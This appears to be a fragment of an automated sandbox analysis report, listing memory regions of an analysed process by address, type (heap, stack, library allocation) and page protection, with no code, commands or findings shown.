trusted library allocation
|
page read and write
|
||
|
2841128D000
|
heap
|
page read and write
|
||
|
6128879000
|
stack
|
page read and write
|
||
|
28412F92000
|
heap
|
page read and write
|
||
|
284130A5000
|
heap
|
page read and write
|
||
|
28411288000
|
heap
|
page read and write
|
||
|
7DF471410000
|
trusted library allocation
|
page execute and read and write
|
||
|
28412F6B000
|
heap
|
page read and write
|
||
|
612954D000
|
stack
|
page read and write
|
||
|
28413040000
|
heap
|
page read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
21001BC6000
|
trusted library allocation
|
page read and write
|
||
|
284130CD000
|
heap
|
page read and write
|
||
|
28412F43000
|
heap
|
page read and write
|
||
|
284130C9000
|
heap
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
2106EE9A000
|
heap
|
page read and write
|
||
|
2106E632000
|
trusted library allocation
|
page read and write
|
||
|
284130EB000
|
heap
|
page read and write
|
||
|
2106ED74000
|
heap
|
page read and write
|
||
|
210011C4000
|
trusted library allocation
|
page read and write
|
||
|
2841306D000
|
heap
|
page read and write
|
||
|
28412F43000
|
heap
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
7FFAACC60000
|
trusted library allocation
|
page read and write
|
||
|
284111E9000
|
heap
|
page read and write
|
||
|
210020A3000
|
trusted library allocation
|
page read and write
|
||
|
2106EC4C000
|
heap
|
page read and write
|
||
|
21000E66000
|
trusted library allocation
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
2841305D000
|
heap
|
page read and write
|
||
|
28412F92000
|
heap
|
page read and write
|
||
|
21010010000
|
trusted library allocation
|
page read and write
|
||
|
2841115D000
|
heap
|
page read and write
|
||
|
2841312B000
|
heap
|
page read and write
|
||
|
28411285000
|
heap
|
page read and write
|
||
|
210018DC000
|
trusted library allocation
|
page read and write
|
||
|
2106CC80000
|
heap
|
page read and write
|
||
|
28412F6E000
|
heap
|
page read and write
|
||
|
7FFB22660000
|
unkown
|
page readonly
|
||
|
21001619000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
28412F66000
|
heap
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
2106CD64000
|
heap
|
page read and write
|
||
|
284111C5000
|
heap
|
page read and write
|
||
|
28412F53000
|
heap
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
21001DA6000
|
trusted library allocation
|
page read and write
|
||
|
2841308E000
|
heap
|
page read and write
|
||
|
28413041000
|
heap
|
page read and write
|
||
|
28413119000
|
heap
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
2841128A000
|
heap
|
page read and write
|
||
|
210014D6000
|
trusted library allocation
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
2106CCDD000
|
heap
|
page read and write
|
||
|
28412F66000
|
heap
|
page read and write
|
||
|
284130EB000
|
heap
|
page read and write
|
||
|
28412F49000
|
heap
|
page read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
21000E32000
|
trusted library allocation
|
page read and write
|
||
|
2C9C06F0000
|
heap
|
page read and write
|
||
|
CE009FE000
|
unkown
|
page read and write
|
||
|
284130E8000
|
heap
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
28413217000
|
heap
|
page read and write
|
||
|
2106CD37000
|
heap
|
page read and write
|
||
|
2106ED50000
|
heap
|
page read and write
|
||
|
28411185000
|
heap
|
page read and write
|
||
|
2841128E000
|
heap
|
page read and write
|
||
|
2106CCF4000
|
heap
|
page read and write
|
||
|
2106EC70000
|
heap
|
page read and write
|
||
|
21001957000
|
trusted library allocation
|
page read and write
|
||
|
21001575000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
210019AB000
|
trusted library allocation
|
page read and write
|
||
|
2106EED0000
|
heap
|
page read and write
|
||
|
6128A7E000
|
stack
|
page read and write
|
||
|
612847E000
|
stack
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
21001109000
|
trusted library allocation
|
page read and write
|
||
|
6128273000
|
stack
|
page read and write
|
||
|
21000B69000
|
trusted library allocation
|
page read and write
|
||
|
2C9C06B0000
|
heap
|
page read and write
|
||
|
284130FB000
|
heap
|
page read and write
|
||
|
2100176C000
|
trusted library allocation
|
page read and write
|
||
|
21001630000
|
trusted library allocation
|
page read and write
|
||
|
28412F4E000
|
heap
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
BC4CDFF000
|
stack
|
page read and write
|
||
|
28412F7E000
|
heap
|
page read and write
|
||
|
2C9C05D0000
|
heap
|
page read and write
|
||
|
2841308E000
|
heap
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
28411100000
|
heap
|
page read and write
|
||
|
284111F4000
|
heap
|
page read and write
|
||
|
284111A2000
|
heap
|
page read and write
|
||
|
21000227000
|
trusted library allocation
|
page read and write
|
||
|
28412F41000
|
heap
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
28410FD0000
|
heap
|
page read and write
|
||
|
2100152A000
|
trusted library allocation
|
page read and write
|
||
|
21001D6A000
|
trusted library allocation
|
page read and write
|
||
|
21001B20000
|
trusted library allocation
|
page read and write
|
||
|
21000FA8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
|
284131BB000
|
heap
|
page read and write
|
||
|
2106CD1B000
|
heap
|
page read and write
|
||
|
284130CD000
|
heap
|
page read and write
|
||
|
7FFB22685000
|
unkown
|
page readonly
|
||
|
21001706000
|
trusted library allocation
|
page read and write
|
||
|
2C9C07F5000
|
heap
|
page read and write
|
||
|
284110D0000
|
heap
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
|
21000F18000
|
trusted library allocation
|
page read and write
|
||
|
2106CE10000
|
trusted library allocation
|
page read and write
|
||
|
2100063E000
|
trusted library allocation
|
page read and write
|
||
|
28412F9A000
|
heap
|
page read and write
|
||
|
BC4D2FE000
|
stack
|
page read and write
|
||
|
284111A4000
|
heap
|
page read and write
|
||
|
2841318E000
|
heap
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
2100189C000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
28412F4F000
|
heap
|
page read and write
|
||
|
28412F73000
|
heap
|
page read and write
|
||
|
2106CCD0000
|
heap
|
page read and write
|
||
|
284130D8000
|
heap
|
page read and write
|
||
|
284130D0000
|
heap
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
2100056F000
|
trusted library allocation
|
page read and write
|
||
|
21001D88000
|
trusted library allocation
|
page read and write
|
||
|
28413125000
|
heap
|
page read and write
|
||
|
2101006D000
|
trusted library allocation
|
page read and write
|
||
|
210014BA000
|
trusted library allocation
|
page read and write
|
||
|
28412F56000
|
heap
|
page read and write
|
||
|
284111EE000
|
heap
|
page read and write
|
||
|
7FFB22660000
|
unkown
|
page readonly
|
||
|
2100209C000
|
trusted library allocation
|
page read and write
|
||
|
28413041000
|
heap
|
page read and write
|
||
|
2C9C07F4000
|
heap
|
page read and write
|
||
|
28412F4E000
|
heap
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
2106EC5C000
|
heap
|
page read and write
|
||
|
284130C9000
|
heap
|
page read and write
|
||
|
28413128000
|
heap
|
page read and write
|
||
|
2106F0A0000
|
heap
|
page read and write
|
||
|
21001A51000
|
trusted library allocation
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
2841128C000
|
heap
|
page read and write
|
||
|
28413127000
|
heap
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
2841320C000
|
heap
|
page read and write
|
||
|
2841308E000
|
heap
|
page read and write
|
||
|
284130A9000
|
heap
|
page read and write
|
||
|
6128777000
|
stack
|
page read and write
|
There are 448 hidden memdumps, click here to show them.